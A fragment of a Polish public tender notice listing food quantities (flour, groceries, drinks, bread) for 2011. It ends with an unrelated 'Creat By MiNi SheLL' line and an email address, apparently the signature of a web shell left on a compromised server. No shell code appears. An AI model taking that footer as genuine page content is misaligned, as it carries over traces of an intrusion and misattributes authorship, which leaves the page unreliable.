<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9 - produkty przemiału ziarna i skrobi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		mąka pszenna typ 750	kg	450				
2		mąka ziemniaczana 1 kg	kg	10				
3		kasza manna 1 kg	kg	30				
4		kasza wiejska 1 kg	kg	60				
5		kasza pęczak 1 kg	kg	30				
6		ryż w woreczkach	Szt.	25				
7		Ryż 1 kg		kg	40				
8		płatki owsiane 1 kg	Szt.	10				
9		płatki kukurydziane 1 kgSzt.	20				
10		płatki 500g		Szt.	20				
11		płatki kukurydziane 250gSzt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.00.00-6, 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10 - różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Drożdżówki 		Szt.	450				
2		makaron kokardki 3 kg	Szt.	15				
3		makaron nitki 3 kg	Szt.	20				
4		makaron świderki 3 kg	kg	45				
5		makaron spaghetti 3 kg	Szt.	12				
6		makaron paczka 3 kg	Szt.	40				
7		makaron zacierka 3 kg	Szt.	80				
8		paszteciki 9 szt.	Op.	400				
9		sól	kg	200				
10		sól konserwowa	kg	50				
11		ciasta różne	kg	40				
12		cukier kryształ 1 kg	kg	700				
13		cukier puder 0,5 kg	szt.	20				
14		kakao Puchatek 0,75 dag	szt.	100				
15		miód sztuczny 1 l	Szt.	25				
16		miód naturalny 1 l	Szt.	25				
17		czekolada pełna mleczna 0,100 g	szt.	120				
18		czekolada	Szt.	40				
19		czekolada nadziewana 0,150 dag	szt.	200				
20		cukierki różne	kg	15				
21		lizaki			Szt.	60				
22		ciastka różne		kg	100				
23		wafelki				kg	12				
24		polewa do lodów owocowa	Szt.	8				
25		polewa do lodów	Szt.	15				
26		zestaw świąteczny	szt	80				
27		wafelki w opk		opk	6				
28		baton			Szt.	80				
29		gofry			Opk.	24				
30		Murzynki 0,300 g	Szt.	160				
31		Mikołaj 0,250 dag	Szt.	40				
32		paluszki		Szt.	80				
33		czipsy				Szt.	20				
34		wafle-miseczki	Szt.	100				
35		kwasek cytrynowy  0,20 g	Szt.	150				
36		cukier waniliowy 0,30 g	Szt.	150				
37		proszek do pieczenia 0,30 g	Szt.	50				
38		krem do ciast	Szt.	20				
39		krem czekoladowy 200g	Szt.	350				
40		masła typu czekoladowe, owocowe 450 g	Szt.	80				
41		herbata expresowa 50szt.	Szt.	5				
42		herbata expresowa 100 szt.	Opk.	25				
43		Herbata 0,100 g	opk	100				
44		herbata expresowa 100 szt.	opk	50				
45		kawa naturalna mielona 250 g	szt.	100				
46		różne produkty spożywcze	kawa 500g	Szt.	30				
47		kawa capucino	Szt.	20				
48		kawa rozpuszczalna zbożowa 0,150 g	Szt.	25				
49		kawa rozpuszczalna 200g	Szt.	20				
50		kawa rozpuszczalna	szt.	50				
51		majonez wiadro 3 kg	Szt.	20				
52		majonez 0,300g	Szt.	24				
53		majonez wiadro 3 kg	szt.	30				
54		Musztarda 0,200 g	szt	30				
55		musztarda 1 l	szt.	30				
56		ocet winny 0,5 l	szt	20				
57		Ocet 0,5 l	szt.	50				
58		ocet balsamiczny 0,5 l	szt.	10				
59		sos sałatkowy koper-ziołowy	Szt.	1				
60		sos chili	Szt.	3				
61		sos sojowy 0,5 l	szt.	4				
62		sos do hamburgerów	Szt.	5				
63		sos słodko-kwaśny w słoikach	szt.	50				
64		sos czosnkowy		Szt.	12				
65		sos do spagetti		Szt.	4				
66		sos do spagetti		Szt.	25				
67		barszcz czerwony koncentrat	szt.	50				
68		keczup 500ml		Szt.	30				
69		ketchup 1 litr		szt.	30				
70		sos meksykański		Szt.	10				
71		żurek butelka		szt.	30				
72		żurek w proszku 	szt.	25				
73		rosół drobiowy 1000 g	szt.	20				
74		zupy chińskie 0,45 g	szt.	200				
75		zupy chińskie 0,45 g	szt.	100				
76		puree			Szt.	100				
77		zupy chińskie 0,45 g	Szt.	200				
78		drożdże 100 g		szt.	10				
79		ziele angielskie 600g	Szt.	8				
80		ziele angielskie 	szt.	25				
81		majeranek 150g		Szt.	12				
82		majeranek 500g		Szt.	4				
83		majeranek 20g		szt.	40				
84		kminek			szt.	20				
85		liść laurowy 		Szt.	50				
86		liść laurowy		szt.	12				
87		pieprz w ziarnach 1000g	Szt.	1				
88		pieprz naturalny 1000g	szt.	12				
89		pieprz 20g	Szt.	25				
90		pieprz ziołowy 20 g	Szt.	6				
91		pieprz ziołowy 20g	Szt.	25				
92		papryka mielona kg	szt.	12				
93		papryka mielona 20g	Szt.	50				
94		curry 25g		Szt.	20				
95		Kurkuma 20 g		Szt.	20				
96		przyprawa do flaków	Szt.	6				
97		magi w płynie 1 l	szt.	10				
98		przyprawa do kurczaka 0,25 g	Szt.	50				
99		przyprawa do kurczaka 1000g	szt.	10				
100		przyprawa typu jarzynka 1kg	Szt.	5				
101		przyprawa typu jarzynka 200g	szt.	200				
102		budyń			Szt.	100				
103		kisiel			Szt.	60				
104		Cynamon 0,20 g		Szt.	50				
105		przyprawa do grilla kg	szt.	3				
106		przyprawa do ryb 600g	szt.	6				
107		przyprawa gyros 30g	Szt.	25				
108		przyprawa gyros 1000 g	szt.	3				
109		zasmażka		kg	5				
110		sos sałatkowy 700g	szt.	10				
111		galaretka owocowa	Szt.	50				
112		żelatyna 1000g		Szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11 - napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		napoje	woda pitna but. 1,5l gazowana	szt.	100				
2		woda pitna but. 1,5l niegazowana	szt.	100				
3		woda pitna but. 0,5 l gazowana		szt.	150				
4		woda pitna but. 0,5l niegazowana	szt.	150				
5		napoje gazowane 2l			szt	48				
6		napoje niegazowane			szt	150				
7		napoje gazowane 1,5 l			szt.	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.90.00.00-7, 15.98.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12- pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		bułka 100g	Szt.	500				
2		bułka 50g	Szt.	2000				
3		rogale		Szt.	300				
4		bułka tarta	szt.	60				
5		bułka hamburger	Szt.	160				
6		chleb mieszany	szt.	200				
7		chleb krojony	szt.	5000				
8		chleb razowy	Szt.	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com